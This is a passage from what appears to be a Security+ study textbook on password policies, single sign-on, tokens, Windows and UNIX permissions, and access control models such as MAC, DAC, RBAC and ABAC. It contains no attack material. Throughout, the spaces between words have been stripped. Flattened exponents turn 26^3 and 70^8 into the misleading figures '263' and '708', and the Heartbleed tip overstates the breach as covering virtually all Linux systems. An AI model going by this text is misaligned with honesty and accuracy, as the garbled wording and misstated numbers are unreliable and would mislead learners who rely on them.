Theusername/passwordcombinationisbyfarthemostcommonmeansofcontrollingaccesstoapplications,websites,andcomputersystems.Theaverageusermayhaveadozenormoreusernameandpasswordcombinationsbetweenschool,work,andpersonaluse.Tohelpusersselectagood,difficult-to-guesspassword,mostorganizationsimplementandenforceapasswordpolicy,whichtypicallyhasthefollowingcomponents:
TechTip
TOTPATime-basedOne-TimePassword(TOTP)generatorusesthecurrenttimeasoneoftheseedsinaone-timepassword.Thispreventsreplayattacksutilizingacapturedpassword.
PasswordconstructionHowmanycharactersapasswordshouldhave;theuseofcapitalization,numbers,andspecialcharacters;notbasingthepasswordonadictionarywordorpersonalinformation;notmakingthepasswordaslightmodificationofanexistingpassword;andsoon
ReuserestrictionsWhetherornotpasswordscanbereused,and,ifso,withwhatfrequency(howmanydifferentpasswordsmustyouusebeforeyoucanuseoneyou’veusedbefore)
DurationTheminimumandmaximumnumberofdaysapasswordcanbeusedbeforeitcanbechangedormustbechanged
ProtectionofpasswordsNotwritingdownpasswordswhereotherscanfindthem,notsavingpasswordsandnotallowingautomatedlogins,notsharingpasswordswithotherusers,andsoon
ConsequencesConsequencesassociatedwithviolationofornoncompliancewiththepolicy
TheSANSInstituteoffersseveralexamplesofpasswordpolicies(alongwithmanyothercommoninformationsecuritypolicies)onitswebsite
(www.sans.org—typepasswordpolicyintothesearchboxatthetopoftheSANSwebsite).Theoverallguidanceestablishedbytheorganization’ssecuritypolicyshouldberefinedintospecificguidancethatadministratorscanenforceattheoperatingsystemlevel.
ExamTip:Apasswordpolicyisasetofrulesdesignedtoenhancecomputersecuritybyrequiringuserstoemployandmaintainstrongpasswords.Adomainpasswordpolicyisapasswordpolicythatappliestoaspecificdomain.
DomainPasswordPolicyAdomainpasswordpolicyisapasswordpolicyforaspecificdomain.AsthesepoliciesareusuallyassociatedwiththeWindowsoperatingsystem,adomainpasswordpolicyisimplementedandenforcedonthedomaincontroller,whichisacomputerthatrespondstosecurityauthenticationrequests,suchasloggingintoacomputer,foraWindowsdomain.Thedomainpasswordpolicyusuallyfallsunderagrouppolicyobject(GPO)andhasthefollowingelements(seeFigure11.4):
•Figure11.4PasswordpolicyoptionsinWindowsLocalSecurityPolicy
EnforcepasswordhistoryTellsthesystemhowmanypasswordstorememberanddoesnotallowausertoreuseanoldpassword.
MaximumpasswordageSpecifiesthemaximumnumberofdaysapasswordmaybeusedbeforeitmustbechanged.
MinimumpasswordageSpecifiestheminimumnumberofdaysapasswordmustbeusedbeforeitcanbechangedagain.
MinimumpasswordlengthSpecifiestheminimumnumberof
charactersthatmustbeusedinapassword.
PasswordmustmeetcomplexityrequirementsSpecifiesthatthepasswordmustmeettheminimumlengthrequirementandhavecharactersfromatleastthreeofthefollowingfourgroups:Englishuppercasecharacters(AthroughZ),Englishlowercasecharacters(athroughz),numerals(0through9),andnon-alphabeticcharacters(suchas!,$,#,%).
StorepasswordsusingreversibleencryptionReversibleencryptionisaformofencryptionthatcaneasilybedecryptedandisessentiallythesameasstoringaplaintextversionofthepassword(becauseit’ssoeasytoreversetheencryptionandgetthepassword).Thisshouldbeusedonlywhenapplicationsuseprotocolsthatrequiretheuser’spasswordforauthentication(suchasChallenge-HandshakeAuthenticationProtocol,orCHAP).
Notonlyisitessentialtoensureeveryaccounthasastrongpassword,butalsoitisessentialtodisableordeleteunnecessaryaccounts.Ifyoursystemdoesnotneedtosupportguestoranonymousaccounts,thendisablethem.Whenuseroradministratoraccountsarenolongerneeded,removeordisablethem.Asabestpractice,alluseraccountsshouldbeauditedperiodicallytoensuretherearenounnecessary,outdated,orunneededaccountsonyoursystems.
Domainsarelogicalgroupsofcomputersthatshareacentraldirectorydatabase,knownastheActiveDirectorydatabaseforthemorerecentWindowsoperatingsystems.Thedatabasecontainsinformationabouttheuseraccountsandsecurityinformationforallresourcesidentifiedwithinthedomain.Eachuserwithinthedomainisassignedhisorherownuniqueaccount(thatis,adomainisnotasingleaccountsharedbymultipleusers),whichisthenassignedaccesstospecificresourceswithinthedomain.Inoperatingsystemsthatprovidedomaincapabilities,thepasswordpolicyissetintherootcontainerforthedomainandappliestoalluserswithinthatdomain.Settingapasswordpolicyforadomainissimilartosettingother
passwordpoliciesinthatthesamecriticalelementsneedtobeconsidered(passwordlength,complexity,life,andsoon).Ifachangetooneoftheseelementsisdesiredforagroupofusers,anewdomainneedstobecreatedbecausethedomainisconsideredasecurityboundary.InaWindowsoperatingsystemthatemploysActiveDirectory,thedomainpasswordpolicycanbesetintheActiveDirectoryUsersandComputersmenuintheAdministrativeToolssectionoftheControlPanel.
TechTip
CalculatingUniquePasswordCombinationsOneoftheprimaryreasonsadministratorsrequireuserstohavelongerpasswordsthatuseupper-andlowercaseletters,numbers,andatleastone“special”characteristohelpdeterpassword-guessingattacks.Onepopularpassword-guessingtechnique,calledabrute-forceattack,usessoftwaretoguesseverypossiblepassworduntilonematchesauser’spassword.Essentially,abruteforce-attacktriesa,thenaa,thenaaa,andsoonuntilitrunsoutofcombinationsorgetsapasswordmatch.Increasingboththepoolofpossiblecharactersthatcanbeusedinthepasswordandthenumberofcharactersrequiredinthepasswordcanexponentiallyincreasethenumberof“guesses”abrute-forceprogramneedstoperformbeforeitrunsoutofpossibilities.Forexample,ifourpasswordpolicyrequiresathree-characterpasswordthatusesonlylowercaseletters,thereareonly17,576possiblepasswords(26possiblecharacters,3characterslongis263combinations).Requiringasix-characterpasswordincreasesthatnumberto308,915,776possiblepasswords(266).Aneight-characterpasswordwithupper-andlowercase,specialsymbol,andanumberincreasesthepossiblepasswordsto708orover576trillioncombinationsPrecomputedhashesinrainbowtablescanalsobeusedtobruteforcepastshorter
passwords.Asthelengthincreases,sodoesthesizeoftherainbowtable.
SingleSign-OnTouseasystem,usersmustbeabletoaccessit,whichtheyusuallydobysupplyingtheiruserIDs(orusernames)andcorrespondingpasswords.Asanysecurityadministratorknows,themoresystemsaparticularuserhasaccessto,themorepasswordsthatusermusthaveandremember.The
naturaltendencyforusersistoselectpasswordsthatareeasytoremember,oreventhesamepasswordforuseonthemultiplesystemstheyaccess.Wouldn’titbeeasierfortheusersimplytologinonceandhavetorememberonlyasingle,goodpassword?Thisismadepossiblewithatechnologycalledsinglesign-on.Singlesign-on(SSO)isaformofauthenticationthatinvolvesthe
transferringofcredentialsbetweensystems.Asmoreandmoresystemsarecombinedindailyuse,usersareforcedtohavemultiplesetsofcredentials.Ausermayhavetologintothree,four,five,orevenmoresystemseverydayjusttodoherjob.Singlesign-onallowsausertotransferhercredentials,sothatloggingintoonesystemactstologherintoallofthem.OncetheuserhasenteredauserIDandpassword,thesinglesign-onsystempassesthesecredentialstransparentlytoothersystemssothatrepeatedlogonsarenotrequired.Putsimply,yousupplytherightusernameandpasswordonceandyouhaveaccesstoalltheapplicationsanddatayouneed,withouthavingtologinmultipletimesandremembermanydifferentpasswords.Fromauserstandpoint,SSOmeansyouneedtorememberonlyoneusernameandonepassword.Fromanadministrationstandpoint,SSOcanbeeasiertomanageandmaintain.Fromasecuritystandpoint,SSOcanbeevenmoresecure,asuserswhoneedtorememberonlyonepasswordarelesslikelytochoosesomethingtoosimpleorsomethingsocomplextheyneedtowriteitdown.Figure11.5showsalogicaldepictionoftheSSOprocess:
•Figure11.5Singlesign-onprocess
1.Theusersignsinonce,providingausernameandpasswordtotheSSOserver.
2.TheSSOserverprovidesauthenticationinformationtoanyresourcetheuseraccessesduringthatsession.Theserverinterfaceswiththeotherapplicationsandsystems—theuserdoesnotneedtologintoeachsystemindividually.
ExamTip:TheCompTIASecurity+examwillverylikelycontainquestionsregardingsinglesign-onbecauseitissuchaprevalenttopicandaverycommonapproachtomultisystemauthentication.
Inreality,SSOisusuallyalittlemoredifficulttoimplementthanvendorswouldleadyoutobelieve.Tobeeffectiveanduseful,allyourapplicationsneedtobeabletoaccessandusetheauthenticationprovidedbytheSSOprocess.Themorediverseyournetwork,thelesslikelythisistobethecase.Ifyournetwork,likemost,containsdifferentoperatingsystems,customapplications,andadiverseuserbase,SSOmaynotevenbeaviableoption.
TimeofDayRestrictionsSomeorganizationsneedtotightlycontrolcertainusers,groups,orevenrolesandlimitaccesstocertainresourcestospecificdaysandtimes.Mostserver-classoperatingsystemsenableadministratorstoimplementtimeofdayrestrictionsthatlimitwhenausercanlogin,whencertainresourcescanbeaccessed,andsoon.Timeofdayrestrictionsareusuallyspecifiedforindividualaccounts,asshowninFigure11.6.
•Figure11.6LogonhoursforGuestaccount
Fromasecurityperspective,timeofdayrestrictionscanbeveryuseful.Ifausernormallyaccessescertainresourcesduringnormalbusinesshours,anattempttoaccesstheseresourcesoutsidethistimeperiod(eitheratnightorontheweekend)mightindicateanattackerhasgainedaccesstooristryingtogainaccesstothataccount.Specifyingtimeofdayrestrictionscanalsoserveasamechanismtoenforceinternalcontrolsofcriticalorsensitiveresources.Obviously,adrawbacktoenforcingtimeofdayrestrictionsisthatitmeansthatausercan’tgotoworkoutsideofnormal
hoursto“catchup”withworktasks.Aswithallsecuritypolicies,usabilityandsecuritymustbebalancedinthispolicydecision.
Becarefulimplementingtimeofdayrestrictions.Someoperatingsystemsgiveyoutheoptionofdisconnectingusersassoonastheir“allowedlogintime”expiresregardlessofwhattheuserisdoingatthetime.Themorecommonlyusedapproachistoallowcurrentlylogged-inuserstostayconnectedbutrejectanyloginattemptsthatoccuroutsideofallowedhours.
TokensWhiletheusername/passwordcombinationhasbeenandcontinuestobethecheapestandmostpopularmethodofcontrollingaccesstoresources,manyorganizationslookforamoresecureandtamper-resistantformofauthentication.Usernamesandpasswordsare“somethingyouknow”(whichcanbeusedbyanyoneelsewhoknowsordiscoverstheinformation).Amoresecuremethodofauthenticationistocombinethe“somethingyouknow”with“somethingyouhave.”Atokenisanauthenticationfactorthattypicallytakestheformofaphysicalorlogicalentitythattheusermustbeinpossessionoftoaccesstheiraccountorcertainresources.Mosttokensarephysicaltokensthatdisplayaseriesofnumbersthat
changesevery30to90seconds,suchasthetokenpicturedinFigure11.7fromBlizzardEntertainment.Thissequenceofnumbersmustbeenteredwhentheuserisattemptingtologinoraccesscertainresources.Theever-changingsequenceofnumbersissynchronizedtoaremoteserversuchthatwhentheuserentersthecorrectusername,password,andmatchingsequenceofnumbers,heisallowedtologin.Evenifanattackerobtainstheusernameandpassword,theattackercannotloginwithoutthematchingsequenceofnumbers.OtherphysicaltokensincludeCommonAccessCards(CACs),USBtokens,smartcards,andPCcards.
•Figure11.7TokenauthenticatorfromBlizzardEntertainment
Tokensmayalsobeimplementedinsoftware.Softwaretokensstillprovidetwo-factorauthenticationbutdon’trequiretheusertohaveaphysicaldeviceonhand.Sometokensrequiresoftwareclientsthatstoreasymmetrickey(sometimescalledaseedrecord)inasecuredlocationontheuser’sdevice(laptop,desktop,tablet,andsoon).Othersoftwaretokensusepublickeycryptography.Asymmetriccryptographysolutions,suchaspublickeycryptography,oftenassociateaPINwithaspecificuser’stoken.Tologinoraccesscriticalresources,theusermustsupplythecorrectPIN.ThePINisstoredonaremoteserverandisusedduringtheauthenticationprocesssothatifauserpresentstherighttoken,butnottherightPIN,theuser’saccesscanbedenied.Thishelpspreventanattackerfromgainingaccessifhegetsacopyoforgainsaccesstothesoftwaretoken.
CrossCheckSymmetricandAsymmetricCryptographyYoulearnedaboutsymmetricandasymmetriccryptographyinChapter5.Whatisthedifference
betweenthetwomethods?Whichoneusespublickeys?
TechTip
BestPractice:PasswordExpirationOneofthebestpracticesanorganizationcanimplementistoattachanexpirationdatetouserpasswords.Thishelpsensurethatifapasswordiscompromised,theperiodthattheaccountremainscompromisedislimited.Inmostenvironmentsandoperatingsystems,thisisexpressedintermsofthenumberofdaysbeforethepasswordexpiresandisnolongervalid.Forexample,amaximumpasswordageof90daysmeansthataparticularpasswordwillexpire90daysafterthatpasswordwasinitiallysettoitscurrentvalue.
AccountandPasswordExpirationAnothercommonrestrictionthatcanbeenforcedinmanyaccesscontrolmechanismsiseither(orboth)anaccountexpirationorpasswordexpirationfeature.Thisallowsadministratorstospecifyaperiodoftimeforwhichapasswordoranaccountwillbeactive.Forpasswordexpiration,whentheexpirationdateisreached,theusergenerallyisaskedtocreateanewpassword.Thismeansthatifthepassword(andthustheaccount)hasbeencompromisedwhentheexpirationdateisreachedandanewpasswordisset,theattackerwillagain(hopefully)belockedoutofthesystem.Theattackercan’tchangethepasswordhimself,sincetheuserwouldthenbelockedoutandwouldcontactanadministratortohavethepasswordreset,thusagainlockingouttheattacker.Anotherattackoptionwouldinvolvetheattackersettinganew
passwordonthecompromisedaccountandthenattemptingtoresettheaccountbacktotheoriginal,compromisedpassword.Iftheattackerissuccessful,anewexpirationtimewouldbesetfortheaccountbuttheoldpasswordwouldstillbeusedandtheuserwouldnotbelockedoutoftheiraccount;inmostcases,theuserwouldn’tnoticeanythinghadhappenedatallastheiroldpasswordwouldcontinuetowork.Thisisonereasonwhya
passwordhistorymechanismshouldbeused.Thehistoryisusedtokeeptrackofpreviouslyusedpasswordssothattheycannotbereused.
TechTip
HeartbleedIn2014avulnerabilitythatcouldcauseusercredentialstobeexposedwasdiscoveredinmillionsofsystems.CalledtheHeartbleedincident,thisresultedinnumeroususersbeingtoldtochangetheirpasswordsbecauseofpotentialcompromise.Userswerealsowarnedofthedangersofreusingpasswordsacrossdifferentaccounts.Althoughthismakespasswordseasiertoremember,italsoimprovesguessingchances.Whatmadethiswholeeffortofprotectingyourpasswordsparticularlychallengingisthatthebreachwaswidespread—virtuallyallLinuxsystems—andthepatchingratewasuneven,sopeoplecouldbesufferingmultipleexposuresovertime.Afteroneyear,anestimated40%ofallcompromisedsystemsremainedunpatched.Thishighlightstheimportanceofnotreusingpasswordsacrossmultipleaccounts.
SecurityControlsandPermissionsIfmultipleusersshareacomputersystem,thesystemadministratorlikelyneedstocontrolwhoisallowedtodowhatwhenitcomestoviewing,using,orchangingsystemresources.Whileoperatingsystemsvaryinhowtheyimplementthesetypesofcontrols,mostoperatingsystemsusetheconceptsofpermissionsandrightstocontrolandsafeguardaccesstoresources.Aswediscussedearlier,permissionscontrolwhatauserisallowedtodowithobjectsonasystemandrightsdefinetheactionsausercanperformonthesystemitself.Let’sexaminehowtheWindowsoperatingsystemsimplementthisconcept.TheWindowsoperatingsystemsusetheconceptsofpermissionsand
rightstocontrolaccesstofiles,folders,andinformationresources.WhenusingtheNTFSfilesystem,administratorscangrantusersandgroupspermissiontoperformcertaintasksastheyrelatetofiles,folders,andRegistrykeys.ThebasiccategoriesofNTFSpermissionsareasfollows:
ExamTip:Permissionscanbeappliedtospecificusersorgroupstocontrolthatuser’sorgroup’sabilitytoview,modify,access,use,ordeleteresourcessuchasfoldersandfiles.
FullControlAuser/groupcanchangepermissionsonthefolder/file,takeownershipifsomeoneelseownsthefolder/file,deletesubfoldersandfiles,andperformactionspermittedbyallotherNTFSfolderpermissions.
ModifyUsers/groupscanviewandmodifyfiles/foldersandtheirproperties,candeleteandaddfiles/folders,andcandeleteoraddpropertiestoafile/folder.
Read&ExecuteUsers/groupscanviewthefile/folderandcanexecutescriptsandexecutablesbutcannotmakeanychanges(files/foldersareread-only).
ListFolderContentsAuser/groupcanlistonlywhatisinsidethefolder(appliestofoldersonly).
ReadUsers/groupscanviewthecontentsofthefile/folderandthefile/folderproperties.
WriteUsers/groupscanwritetothefileorfolder.
Figure11.8showsthepermissionsonafoldercalledDatafromaWindowsServersystem.InthetophalfofthePermissionswindowaretheusersandgroupsthathavepermissionsforthisfolder.Inthebottomhalfofthewindowarethepermissionsassignedtothehighlighteduserorgroup.
•Figure11.8PermissionsfortheDatafolder
TheWindowsoperatingsystemalsousesuserrightsorprivilegestodeterminewhatactionsauserorgroupisallowedtoperformoraccess.Theseuserrightsaretypicallyassignedtogroups,asitiseasiertodealwithafewgroupsthantoassignrightstoindividualusers,andtheyareusuallydefinedineitheragrouporalocalsecuritypolicy.Thelistofuserrightsisquiteextensivebutafewexamplesofuserrightsare
LogonlocallyUsers/groupscanattempttologontothelocalsystemitself.
AccessthiscomputerfromthenetworkUsers/groupscanattempttoaccessthissystemthroughthenetworkconnection.
ManageauditingandsecuritylogUsers/groupscanview,modify,anddeleteauditingandsecurityloginformation.
Rightstendtobeactionsthatdealwithaccessingthesystemitself,processcontrol,logging,andsoon.Figure11.9showstheuserrightscontainedinthelocalsecuritypolicyonaWindowssystem.
•Figure11.9UserRightsAssignmentoptionsfromWindowsLocalSecurityPolicy
Foldersandfilesarenottheonlythingsthatcanbesafeguardedorcontrolledusingpermissions.Evenaccessanduseofperipherals,suchasprinters,canbecontrolledusingpermissions.Figure11.10showstheSecuritytabfromaprinterattachedtoaWindowssystem.Permissionscanbeassignedtocontrolwhocanprinttotheprinter,whocanmanagedocumentsandprintjobssenttotheprinter,andwhocanmanagetheprinteritself.Withthistypeofgranularcontrol,administratorshaveagreatdealofcontroloverhowsystemresourcesareusedandwhousesthem.
•Figure11.10SecuritytabshowingprinterpermissionsinWindows
ExamTip:Althoughitisveryimportanttogetsecuritysettings“rightthefirsttime,”itisjustasimportanttoperformroutineauditsofsecuritysettingssuchasuseraccounts,groupmemberships,filepermissions,andsoon.
Averyimportantconcepttoconsiderwhenassigningrightsandprivilegestousersistheconceptofleastprivilege.Leastprivilegerequiresthatusersbegiventheabsoluteminimumnumberofrightsandprivilegesrequiredtoperformtheirauthorizedduties.Forexample,ifauserdoesnotneedtheabilitytoinstallsoftwareontheirowndesktoptoperformtheirjob,thendon’tgivethemthatability.Thisreducesthelikelihoodtheuserwillloadmalware,insecuresoftware,orunauthorizedapplicationsontotheirsystem.
AccessControlListsThetermaccesscontrollist(ACL)isusedinmorethanonemannerinthefieldofcomputersecurity.Whendiscussingroutersandfirewalls,anACLisasetofrulesusedtocontroltrafficflowintooroutofaninterfaceornetwork.Whendiscussingsystemresources,suchasfilesandfolders,anACLlistspermissionsattachedtoanobject—whoisallowedtoview,modify,move,ordeletethatobject.Toillustratethisconcept,consideranexample.Figure11.11showsthe
accesscontrollist(permissions)fortheDatafolder.TheuseridentifiedasBillyWilliamshasRead&Execute,ListFolderContents,andReadpermissions,meaningthisusercanopenthefolder,seewhat’sinthefolder,andsoon.Figure11.12showsthepermissionsforauseridentifiedasLeahJones,whohasonlyReadpermissionsonthesamefolder.
•Figure11.11PermissionsforBillyWilliamsontheDatafolder
•Figure11.12PermissionsforLeahJonesontheDatafolder
Incomputersystemsandnetworks,thereareseveralwaysthataccesscontrolscanbeimplemented.Anaccesscontrolmatrixprovidesthesimplestframeworkforillustratingtheprocess.AnexampleofanaccesscontrolmatrixisprovidedinTable11.1.Inthismatrix,thesystemiskeepingtrackoftwoprocesses,twofiles,andonehardwaredevice.Process1canreadbothFile1andFile2butcanwriteonlytoFile1.Process1cannotaccessProcess2,butProcess2canexecuteProcess1.Bothprocesseshavetheabilitytowritetotheprinter.
Table11.1 AnAccessControlMatrix
Whilesimpletounderstand,theaccesscontrolmatrixisseldomusedincomputersystemsbecauseitisextremelycostlyintermsofstoragespaceandprocessing.Imaginethesizeofanaccesscontrolmatrixforalargenetworkwithhundredsofusersandthousandsoffiles.
MandatoryAccessControl(MAC)Mandatoryaccesscontrol(MAC)istheprocessofcontrollingaccesstoinformationbasedonthesensitivityofthatinformationandwhetherornottheuserisoperatingattheappropriatesensitivitylevelandhastheauthoritytoaccessthatinformation.UnderaMACsystem,eachpieceofinformationandeverysystemresource(files,devices,networks,andsoon)islabeledwithitssensitivitylevel(suchasPublic,Engineering
Private,JonesSecret).Usersareassignedaclearancelevelthatsetstheupperboundaryoftheinformationanddevicesthattheyareallowedtoaccess.
ExamTip:Mandatoryaccesscontrolrestrictsaccessbasedonthesensitivityoftheinformationandwhetherornottheuserhastheauthoritytoaccessthatinformation.
TheaccesscontrolandsensitivitylabelsarerequiredinaMACsystem.Labelsaredefinedandthenassignedtousersandresources.Usersmustthenoperatewithintheirassignedsensitivityandclearancelevels—theydon’thavetheoptiontomodifytheirownsensitivitylevelsorthelevelsoftheinformationresourcestheycreate.Duetothecomplexityinvolved,MACistypicallyrunonlyonsystemswheresecurityisatopprioritysuchasTrustedSolaris,OpenBSD,andSELinux.
TechTip
MACObjectiveMandatoryaccesscontrolsareoftenmentionedindiscussionsofmultilevelsecurity.Formultilevelsecuritytobeimplemented,amechanismmustbepresenttoidentifytheclassificationofallusersandfiles.AfileidentifiedasTopSecret(hasalabelindicatingthatitisTopSecret)maybeviewedonlybyindividualswithaTopSecretclearance.Forthiscontrolmechanismtoworkreliably,allfilesmustbemarkedwithappropriatecontrolsandalluseraccessmustbechecked.ThisistheprimarygoalofMAC.
Figure11.13illustratesMACinoperation.Theinformationresourceonthelefthasbeenlabeled“EngineeringSecret,”meaningonlyusersintheEngineeringgroupoperatingattheSecretsensitivitylevelorabovecanaccessthatresource.ThetopuserisoperatingattheSecretlevelbutisnotamemberofEngineeringandisdeniedaccesstotheresource.ThemiddleuserisamemberofEngineeringbutisoperatingataPublicsensitivity
levelandisthereforedeniedaccesstotheresource.ThebottomuserisamemberofEngineering,isoperatingataSecretsensitivitylevel,andisallowedtoaccesstheinformationresource.
•Figure11.13Logicalrepresentationofmandatoryaccesscontrol
DiscretionaryAccessControl(DAC)Discretionaryaccesscontrol(DAC)istheprocessofusingfilepermissionsandoptionalACLstorestrictaccesstoinformationbasedonauser’sidentityorgroupmembership.DACisthemostcommonaccesscontrolsystemandiscommonlyusedinbothUNIXandWindowsoperatingsystems.The“discretionary”partofDACmeansthatafileor
resourceownerhastheabilitytochangethepermissionsonthatfileorresource.
TechTip
MultilevelSecurityIntheU.S.government,thefollowingsecuritylabelsareusedtoclassifyinformationandinformationresourcesforMACsystems:
TopSecretThehighestsecuritylevelandisdefinedasinformationthatwouldcause“exceptionallygravedamage”tonationalsecurityifdisclosed.
SecretThesecondhighestlevelandisdefinedasinformationthatwouldcause“seriousdamage”tonationalsecurityifdisclosed.
ConfidentialThelowestlevelofclassifiedinformationandisdefinedasinformationthatwould“damage”nationalsecurityifdisclosed.
ForOfficialUseOnlyInformationthatisunclassifiedbutnotreleasabletopublicorunauthorizedparties.SometimescalledSensitiveButUnclassified(SBU)
UnclassifiedNotanofficialclassificationlevel.
Thelabelsworkinatop-downfashionsothatanindividualholdingaSecretclearancewouldhaveaccesstoinformationattheSecret,Confidential,andUnclassifiedlevels.AnindividualwithaSecretclearancewouldnothaveaccesstoTopSecretresources,asthatlabelisabovethehighestleveloftheindividual’sclearance.
UnderUNIXoperatingsystems,filepermissionsconsistofthreedistinctparts:
Ownerpermissions(read,write,andexecute)Theownerofthefile
Grouppermissions(read,write,andexecute)Thegrouptowhichtheownerofthefilebelongs
Worldpermissions(read,write,andexecute)Anyoneelsewhoisnottheowneranddoesnotbelongtothegrouptowhichtheownerofthefilebelongs
ExamTip:Discretionaryaccesscontrolrestrictsaccessbasedontheuser’sidentityorgroupmembership.
Forexample,supposeafilecalledsecretdatahasbeencreatedbytheownerofthefile,Luke,whoispartoftheEngineeringgroup.TheownerpermissionsonthefilewouldreflectLuke’saccesstothefile(astheowner).ThegrouppermissionswouldreflecttheaccessgrantedtoanyonewhoispartoftheEngineeringgroup.TheworldpermissionswouldrepresenttheaccessgrantedtoanyonewhoisnotLukeandisnotpartoftheEngineeringgroup.InUNIX,afile’spermissionsareusuallydisplayedasaseriesofnine
characters,withthefirstthreecharactersrepresentingtheowner’spermissions,thesecondthreecharactersrepresentingthegrouppermissions,andthelastthreecharactersrepresentingthepermissionsforeveryoneelse,orfortheworld.ThisconceptisillustratedinFigure11.14.
•Figure11.14DiscretionaryfilepermissionsintheUNIXenvironment
SupposethefilesecretdataisownedbyLukewithgrouppermissions
forEngineering(becauseLukeispartoftheEngineeringgroup),andthepermissionsonthatfilearerwx,rw-,and---,asshowninFigure11.14.Thiswouldmeanthat:
Lukecanread,write,andexecutethefile(rwx).
MembersoftheEngineeringgroupcanreadandwritethefilebutnotexecuteit(rw-).
Theworldhasnoaccesstothefileandcan’tread,write,orexecuteit(---).
RememberthatundertheDACmodel,thefile’sowner,Luke,canchangethefile’spermissionsanytimehewants.
Role-BasedAccessControl(RBAC)Accesscontrollistscanbecumbersomeandcantaketimetoadministerproperly.Role-basedaccesscontrol(RBAC)istheprocessofmanagingaccessandprivilegesbasedontheuser’sassignedroles.RBACistheaccesscontrolmodelthatmostcloselyresemblesanorganization’sstructure.Inthisscheme,insteadofeachuserbeingassignedspecificaccesspermissionsfortheobjectsassociatedwiththecomputersystemornetwork,thatuserisassignedasetofrolesthattheusermayperform.Therolesareinturnassignedtheaccesspermissionsnecessarytoperformthetasksassociatedwiththerole.Userswillthusbegrantedpermissionstoobjectsintermsofthespecificdutiestheymustperform—notjustbecauseofasecurityclassificationassociatedwithindividualobjects.
Asdefinedbythe“OrangeBook,”aDepartmentofDefensedocument(inthe“rainbowseries”)thatatonetimewasthestandardfordescribingwhatconstitutedatrustedcomputingsystem,adiscretionaryaccesscontrol(DAC)is“ameansofrestrictingaccesstoobjectsbasedontheidentityofsubjectsand/orgroupstowhichtheybelong.Thecontrolsarediscretionaryinthesensethatasubjectwithacertainaccesspermissioniscapableofpassingthatpermission
(perhapsindirectly)ontoanyothersubject(unlessrestrainedbymandatoryaccesscontrol).”
UnderRBAC,youmustfirstdeterminetheactivitiesthatmustbeperformedandtheresourcesthatmustbeaccessedbyspecificroles.Forexample,theroleof“securityadmin”inMicrosoftSQLServermustbeabletocreateandmanagelogins,readerrorlogs,andaudittheapplication.Oncealltherolesarecreatedandtherightsandprivilegesassociatedwiththoserolesaredetermined,userscanthenbeassignedoneormorerolesbasedontheirjobfunctions.Whenaroleisassignedtoaspecificuser,theusergetsalltherightsandprivilegesassignedtothatrole.
ExamTip:Role-basedandrule-basedaccesscontrolcanbothbeabbreviatedasRBAC.StandardconventionisforRBACtobeusedtodenoterole-basedaccesscontrol.Aseldom-seenacronymforrule-basedaccesscontrolisRB-RBAC.Role-basedfocusesontheuser’srole(administrator,backupoperator,andsoon).Rule-basedfocusesonpredefinedcriteriasuchastimeofday(userscanonlyloginbetween8A.M.and6P.M.)ortypeofnetworktraffic(webtrafficisallowedtoleavetheorganization).
Unfortunately,inreality,administratorsoftenfindthemselvesinapositionofworkinginanorganizationwheremorethanoneuserhasmultiplerolesorevenaccesstomultipleaccounts(asituationquitecommoninsmallerorganizations).Userswithmultipleaccountstendtoselectthesameorsimilarpasswordsforthoseaccounts,therebyincreasingthechanceonecompromisedaccountcanleadtothecompromiseofotheraccountsaccessedbythatuser.Wherepossible,administratorsshouldfirsteliminatesharedoradditionalaccountsforusersandthenexaminethepossibilityofcombiningrolesorprivilegestoreducethe“accountfootprint”ofindividualusers.
Rule-BasedAccessControlRule-basedaccesscontrolisyetanothermethodofmanagingaccessand
privileges(andunfortunatelysharesthesameacronymasrole-basedaccesscontrol).Inthismethod,accessiseitherallowedordeniedbasedonasetofpredefinedrules.EachobjecthasanassociatedACL(muchlikeDAC),andwhenaparticularuserorgroupattemptstoaccesstheobject,theappropriateruleisapplied.
ExamTip:TheCompTIASecurity+examwillverylikelyexpectyoutobeabletodifferentiatebetweenthefourmajorformsofaccesscontroldiscussedhere:mandatoryaccesscontrol,discretionaryaccesscontrol,role-basedaccesscontrol,andrule-basedaccesscontrol.
Agoodexampleforrule-basedaccesscontrolispermittedlogonhours.Manyoperatingsystemsgiveadministratorstheabilitytocontrolthehoursduringwhichuserscanlogin.Forexample,abankmayallowitsemployeestologinonlybetweenthehoursof8A.M.and6P.M.MondaythroughSaturday.Ifauserattemptstologinoutsideofthesehours,3A.M.onSundayforexample,thentherulewillrejecttheloginattemptwhetherornottheusersuppliesvalidlogincredentials.
Attribute-BasedAccessControl(ABAC)Attribute-basedaccesscontrol(ABAC)isanewaccesscontrolschemabasedontheuseofattributesassociatedwithanidentity.Thesecanuseanytypeofattributes(userattributes,resourceattributes,environmentattributes,andsoon),suchaslocation,time,activitybeingrequested,andusercredentials.Anexamplewouldbeadoctorgettingonesetofaccessforaspecificpatientversusadifferentpatient.ABACcanberepresentedviatheeXtensibleAccessControlMarkupLanguage(XACML),astandardthatimplementsattribute-andpolicy-basedaccesscontrolschemes.
AccountExpiration
Inadditiontoalltheothermethodsofcontrollingandrestrictingaccess,mostmodernoperatingsystemsallowadministratorstospecifythelengthoftimeanaccountisvalidandwhenit“expires”orisdisabled.Thisisagreatmethodforcontrollingtemporaryaccounts,oraccountsforcontractorsorcontractemployees.Fortheseaccounts,theadministratorcanspecifyanexpirationdate;whenthedateisreached,theaccountautomaticallybecomeslockedoutandcannotbeloggedintowithoutadministratorintervention.Arelatedactioncanbetakenwithaccountsthatneverexpire:theycanautomaticallybemarked“inactive”andlockedoutiftheyhavebeenunusedforaspecifiednumberofdays.Accountexpirationissimilartopasswordexpiration,inthatitlimitsthetimewindowofpotentialcompromise.Whenanaccounthasexpired,itcannotbeusedunlesstheexpirationdeadlineisextended.
TechTip
DisablingAccountsWhenanadministratorneedstoendauser’saccess,forinstanceupontermination,thereareseveraloptions.Thebestoptionistodisabletheaccountbutleaveitinthesystem.ThispreservesaccountpermissionchainsandpreventsreuseofauserID,leadingtopotentialconfusionlaterwhenexamininglogs.
Similarly,organizationsmustdefinewhetheraccountsaredeletedordisabledwhennolongerneeded.Deletinganaccountremovestheaccountfromthesystempermanently,whereasdisablinganaccountleavesitinplacebutmarksitasunusable.Manyorganizationsdisableaccountsforaperiodoftimeafteranemployeedeparts(30ormoredays)priortodeletingtheaccount.Thispreventsanyonefromusingtheaccountandallowsadministratorstoreassignfiles,forwardmail,and“cleanup”beforetakinganypermanentactionsontheaccount.
PreventingDataLossorTheft
